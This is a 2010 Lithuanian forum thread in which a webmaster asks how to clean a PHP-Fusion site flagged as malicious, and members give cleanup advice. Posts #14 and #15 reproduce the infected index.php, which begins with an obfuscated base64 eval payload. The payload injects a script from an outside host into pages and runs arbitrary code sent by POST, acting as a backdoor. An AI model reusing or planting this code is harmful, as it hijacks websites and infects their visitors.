Temos pavadinimas: WordPress, Shopify ir PHPFusion programuotojų bendruomenė :: Kenkejiskas WEB

Parašė B0sas· 2010 Vas. 23 16:02:50
#1
Sveiki, gal galit padėt apsisaugot nuo šito






?.


ir iš kur šitu virusu atsirado ?. bučiau super dekingas;)
Redagavo Impossibru· 2010 Vas. 23 17:02:02

Parašė botanik· 2010 Vas. 23 16:02:19
#2
Apziurek wisus wisus failus, ir ieskok kenkejisko kodo ;)

Parašė nbanba· 2010 Vas. 23 16:02:31
#3
Gal padės:
https://webdnd.com/virusai,s207

Parašė nesby· 2010 Vas. 23 16:02:25
#4
siusk notepad ++ sumesk failus, ivesk i paieska iframe, is deletins, tada siusk malwerybes anti malware ir skanuok su juo pc, dasr su antivirusine, po to keisk visus ftp pasw, tada per webmaster tools parasai, kad greiciau patikrintu, turejau vasara ta nemalonuma

Parašė B0sas· 2010 Vas. 23 17:02:58
#5
krc :D, beveik nk nesupratau :)

Parašė blist· 2010 Vas. 23 17:02:18
#6
jei nieko nesupranti, trink tada lauk savo tą saitą, kol per jį kiti neužsikrėtė..

Parašė B0sas· 2010 Vas. 23 17:02:19
#7
O kaip padaryt kad sitie dalykai neuzpultu antra karta ? kokias gal apsaugas reik diegti ?

Parašė nesby· 2010 Vas. 23 17:02:08
#8
B0sas parašė:
O kaip padaryt kad sitie dalykai neuzpultu antra karta ? kokias gal apsaugas reik diegti ?


antivirusineisidiek gera

Parašė B0sas· 2010 Vas. 23 17:02:56
#9
Į FTP ? ar PC aš PC naudoju legalu Kaspersky.

Parašė Waldoss· 2010 Vas. 23 17:02:33
#10
Index.php failuise apačioje yra nereikalingas kodas,ištrint ji.

Parašė nesby· 2010 Vas. 23 17:02:16
#11
apželtukas parašė:
Index.php failuise apačioje yra nereikalingas kodas,ištrint ji.


po to skanuok pc ir keisk pasw, kitokiu atveju vel gris virusas

Parašė B0sas· 2010 Vas. 23 17:02:24
#12
Kaip ta pnš nereikalinga eilute atrodo :? ir visuose index.php failuose ?
Redagavo B0sas· 2010 Vas. 23 17:02:09

Parašė nesby· 2010 Vas. 23 17:02:48
#13
B0sas parašė:
Kaip ta pnš nereikalinga eilute atrodo :? ir visuose index.php failuose ?


iframe vadinasi, gali buti ir ne iframe
Redagavo nesby· 2010 Vas. 23 18:02:17

Parašė B0sas· 2010 Vas. 23 17:02:54
#14
Stai kaip atrodo pagrindinis index.php
 <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnYWhxJykpe2Z1bmN0aW9uIGFocSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMWhjbXRoYm1SamFHRndjR1ZzYkM1eWRTOW5kV1Z6ZEM5amIyNTBZV04wTG5Cb2NDQStQQzl6WTNKcGNIUSsnKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGFocTIoJGEsJGIsJGMsJGQpe2dsb2JhbCRhaHExOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRhaHExKSljYWxsX3VzZXJfZnVuYygkYWhxMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nYWhxJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnYWhxJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGFocWw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2FocTInKSkhPSdhaHEyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php
/*-------------------------------------------------------+
| PHP-Fusion Content Management System
| Copyright (C) 2002 - 2008 Nick Jones
| http://www.php-fusion.co.uk/
+--------------------------------------------------------+
| Filename: index.php
| Author: Nick Jones (Digitanium)
+--------------------------------------------------------+
| This program is released as free software under the
| Affero GPL license. You can redistribute it and/or
| modify it under the terms of this license which you
| can read by viewing the included agpl.txt or online
| at www.gnu.org/licenses/agpl.html. Removal of this
| copyright header is strictly prohibited without
| written permission from the original author(s).
+--------------------------------------------------------*/
require_once "maincore.php";

redirect($settings['opening_page']);
?>



Parašė Waldoss· 2010 Vas. 23 18:02:43
#15
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnYWhxJykpe2Z1bmN0aW9uIGFocSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMWhjbXRoYm1SamFHRndjR1ZzYkM1eWRTOW5kV1Z6ZEM5amIyNTBZV04wTG5Cb2NDQStQQzl6WTNKcGNIUSsnKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGFocTIoJGEsJGIsJGMsJGQpe2dsb2JhbCRhaHExOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRhaHExKSljYWxsX3VzZXJfZnVuYygkYWhxMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nYWhxJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnYWhxJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGFocWw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2FocTInKSkhPSdhaHEyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs='merkia akį); ?><?php
/*-------------------------------------------------------+
| PHP-Fusion Content Management System
| Copyright (C) 2002 - 2008 Nick Jones
| http://www.php-fusion.co.uk/
+--------------------------------------------------------+
| Filename: index.php
| Author: Nick Jones (Digitanium)
+--------------------------------------------------------+
| This program is released as free software under the
| Affero GPL license. You can redistribute it and/or
| modify it under the terms of this license which you
| can read by viewing the included agpl.txt or online
| at www.gnu.org/licenses/agpl.html. Removal of this
| copyright header is strictly prohibited without
| written permission from the original author(s).
+--------------------------------------------------------*/
require_once "maincore.php";

redirect($settings['opening_page']);
?>




Parašė blist· 2010 Vas. 23 18:02:23
#16
pati pirma šūdą ištrynk

Parašė B0sas· 2010 Vas. 23 18:02:22
#17
<?php

$serverIP = "82.135.231.6";
$serverPort = 7777;

try
{
$rQuery = new QueryServer( $serverIP, $serverPort );

$aInformation = $rQuery->GetInfo( );
$aServerRules = $rQuery->GetRules( );
$aBasicPlayer = $rQuery->GetPlayers( );
$aTotalPlayers = $rQuery->GetDetailedPlayers( );
$serverIP = "82.135.231.6";
$serverPort = 7777;

$rQuery->Close( );
}
catch (QueryServerException $pError)
{
echo 'Serveris išjungtas';
}

if(isset($aInformation) && is_array($aInformation)){
?>
<table width='350' align='center' border='2' >
<tr>
<td style='color:#ffffff'>Pavadinimas:</td>
<td style='color:#ffffff'><?php echo htmlentities($aInformation['Hostname']); ?></td>
</tr>
<tr>
<td style='color:#ffffff'>Modifikacija</td>
<td style='color:#ffffff'><?php echo htmlentities($aInformation['Gamemode']); ?></td>
</tr>
<tr>
<td style='color:#ffffff'>Žaidejai</td>
<td style='color:#ffffff'><?php echo $aInformation['Players']; ?> / <?php echo $aInformation['MaxPlayers']; ?></td>
</tr>
<tr>
<td style='color:#ffffff'>Žemėlapis</td>
<td style='color:#ffffff'><?php echo htmlentities($aInformation['Map']); ?></td>
</tr>
<td style='color:#ffffff'>IP:</td>
<td style='color:#ffffff'><?php echo $serverIP; ?>:<?php echo $serverPort; ?></td>
<tr>
<td style='color:#ffffff'>Oras</td>
<td style='color:#ffffff'><?php echo $aServerRules['weather']; ?></td>
</tr>
<tr>
<td style='color:#ffffff'>Laikas</td>
<td style='color:#ffffff'><?php echo $aServerRules['worldtime']; ?></td>
</tr>
<tr>
<td style='color:#ffffff'>Versija</td>
<td style='color:#ffffff'><?php echo $aServerRules['version']; ?></td>
</tr>

<tr>



</tr>


</table>

<br />
<?php
if(!is_array($aTotalPlayers) || count($aTotalPlayers) == 0){
echo '<br /><i>Prisijungusių žaidėjų nėra.</i>';
} else {
?>
<table width='350' align='center' border='1'>
<tr>
<td style='color:#ffffff'><b>ID</b></td>
<td style='color:#ffffff'><b>Žaidejas</b></td>
<td style='color:#ffffff'><b>Pinigai</b></td>
</tr>
<?php
foreach($aTotalPlayers AS $id => $value){
?>
<tr>
<td style='color:#ffffff'><?php echo $value['PlayerID']; ?></td>
<td style='color:#ffffff'><?php echo htmlentities($value['Nickname']); ?></td>
<td style='color:#ffffff'><?php echo $value['Score']; ?></td>
</tr>
<?php
}

echo '</table>';
}
}

class QueryServer
{
private $szServerIP;
private $iPort;
private $rSocketID;

private $bStatus;

function __construct( $szServerIP, $iPort )
{
$this->szServerIP = $this->VerifyAddress( $szServerIP );
$this->iPort = $iPort;

if (empty( $this->szServerIP ) || !is_numeric( $iPort )) {
throw new QueryServerException( 'Either the ip-address or the port isn\'t filled in correctly.' );
}

$this->rSocketID = @fsockopen( 'udp://' . $this->szServerIP, $iPort, $iErrorNo, $szErrorStr, 5 );
if (!$this->rSocketID) {
throw new QueryServerException( 'Cannot connect to the server: ' . $szErrorStr );
}

socket_set_timeout( $this->rSocketID, 0, 500000 );
$this->bStatus = true;
}

function VerifyAddress( $szServerIP )
{
if (ip2long( $szServerIP ) !== false &&
long2ip( ip2long( $szServerIP ) ) == $szServerIP ) {
return $szServerIP;
}

$szAddress = gethostbyname( $szServerIP );
if ($szAddress == $szServerIP) {
return "";
}

return $szAddress;
}

function SendPacket( $cPacket )
{
$szPacket = 'SAMP';
$aIpChunks = explode( '.', $this->szServerIP );

foreach( $aIpChunks as $szChunk ) {
$szPacket .= chr( $szChunk );
}

$szPacket .= chr( $this->iPort & 0xFF );
$szPacket .= chr( $this->iPort >> 8 & 0xFF );
$szPacket .= $cPacket;

return fwrite( $this->rSocketID, $szPacket, strlen( $szPacket ) );
}

function GetPacket( $iBytes )
{
$iResponse = fread( $this->rSocketID, $iBytes );
if ($iResponse === false) {
throw new QueryServerException( 'Connection to ' . $this->szServerIP . ' failed or has dropped.' );
}

$iLength = ord( $iResponse );
if ($iLength > 0)
return fread( $this->rSocketID, $iLength );

return "";
}

function Close( )
{
if ($this->rSocketID !== false) {
fclose( $this->rSocketID );
}
}

function toInteger( $szData )
{
$iInteger = 0;

$iInteger += ( ord( @$szData[ 0 ] ) );
$iInteger += ( ord( @$szData[ 1 ] ) << 8 );
$iInteger += ( ord( @$szData[ 2 ] ) << 16 );
$iInteger += ( ord( @$szData[ 3 ] ) << 24 );

if( $iInteger >= 4294967294 )
$iInteger -= 4294967296;

return $iInteger;
}


function GetInfo( )
{
if ($this->SendPacket('i') === false) {
throw new QueryServerException( 'Connection to ' . $this->szServerIP . ' failed or has dropped.' );
}

$szFirstData = fread( $this->rSocketID, 4 );
if (empty( $szFirstData ) || $szFirstData != 'SAMP') {
throw new QueryServerException( 'The server at ' . $this->szServerIP . ' is not an SA-MP Server.' );
}

fread( $this->rSocketID, 7 );

return array (
'Password' => ord( fread( $this->rSocketID, 1 ) ),
'Players' => $this->toInteger( fread( $this->rSocketID, 2 ) ),
'MaxPlayers' => $this->toInteger( fread( $this->rSocketID, 2 ) ),
'Hostname' => $this->GetPacket( 4 ),
'Gamemode' => $this->GetPacket( 4 ),
'Map' => $this->GetPacket( 4 )
);
}

function GetRules( )
{
if ($this->SendPacket('r') === false) {
throw new QueryServerException( 'Connection to ' . $this->szServerIP . ' failed or has dropped.' );
}

// Pop the first 11 bytes from the response;
fread( $this->rSocketID, 11 );

$iRuleCount = ord( fread( $this->rSocketID, 2 ) );
$aReturnArray = array( );

for( $i = 0; $i < $iRuleCount; $i ++ ) {
$szRuleName = $this->GetPacket( 1 );
$aReturnArray[ $szRuleName ] = $this->GetPacket( 1 );
}

return $aReturnArray;
}

function GetPlayers( )
{
if ($this->SendPacket('c') === false) {
throw new QueryServerException( 'Connection to ' . $this->szServerIP . ' failed or has dropped.' );
}

// Again, pop the first eleven bytes send;
fread( $this->rSocketID, 11 );

$iPlayerCount = ord( fread( $this->rSocketID, 2 ) );
$aReturnArray = array( );

for( $i = 0; $i < $iPlayerCount; $i ++ )
{
$aReturnArray[ ] = array (
'Nickname' => $this->GetPacket( 1 ),
'Score' => $this->toInteger( fread( $this->rSocketID, 4 ) )
);
}

return $aReturnArray;
}

function GetDetailedPlayers( )
{
if ($this->SendPacket('d') === false) {
throw new QueryServerException( 'Connection to ' . $this->szServerIP . ' failed or has dropped.' );
}

fread( $this->rSocketID, 11 );

$iPlayerCount = ord( fread( $this->rSocketID, 2 ) );
$aReturnArray = array( );

for( $i = 0; $i < $iPlayerCount; $i ++ ) {
$aReturnArray[ ] = array(
'PlayerID' => $this->toInteger( fread( $this->rSocketID, 1 ) ),
'Nickname' => $this->GetPacket( 1 ),
'Score' => $this->toInteger( fread( $this->rSocketID, 4 ) ),
'Ping' => $this->toInteger( fread( $this->rSocketID, 4 ) )
);
}

return $aReturnArray;
}

function RCON($rcon, $command)
{
echo 'Password '.$rcon.' with '.$command;
if ($this->SendPacket('x '.$rcon.' '.$command) === false) {
throw new QueryServerException( 'Connection to ' . $this->szServerIP . ' failed or has dropped.' );
}

// Pop the first 11 bytes from the response;
$aReturnArray = fread( $this->rSocketID, 11 );

echo fread( $this->rSocketID, 11 );

return $aReturnArray;
}

}

class QueryServerException extends Exception
{

private $szMessage;

function __construct( $szMessage )
{
$this->szMessage = $szMessage;
}

function toString( )
{
return $this->szMessage;
}
}

?>




kURIOJ VIETOJ CIA VIRUSAS ?:)
Redagavo B0sas· 2010 Vas. 23 18:02:54

Parašė Waldoss· 2010 Vas. 23 18:02:59
#18
Irgi,gi žiūrėk tas pats kodas,logiškai galvok,trink.
Redagavo Waldoss· 2010 Vas. 23 18:02:18

Parašė B0sas· 2010 Vas. 23 18:02:58
#19
Nematau šitan skipte :). kurioj vietoj ?

Parašė Waldoss· 2010 Vas. 23 18:02:10
#20
Niera ne ten pažiūrėjau. Dažniausiai būna šituose failuose:

Index.php
Administration/index.php
Forum/index.php

Parašė nesby· 2010 Vas. 23 18:02:59
#21
B0sas parašė:
Nematau šitan skipte :). kurioj vietoj ?


visikai zaias ziuriu, atidarai per notepad, spaudi edit- find ir paste, jei nera tai nera

Parašė B0sas· 2010 Vas. 23 18:02:26
#22
Hm, kitur nebemeta kad kenkejiskas web. bet kai parasai sampzone.lt ir ieini meta. o kai spaudi Namai nemeta. padetu jai istrinciau visus failus ir per naujo ?
Beje Apželtuk kai ainu i tavo Photoshop.us.lt irgi meta ta pacia lentute :DD
Redagavo B0sas· 2010 Vas. 23 18:02:50

Parašė B0sas· 2010 Vas. 23 19:02:39
#23
Ištriniau FTP, dbr visiskai tusčia. bet vistiek iejus meta ta sh :(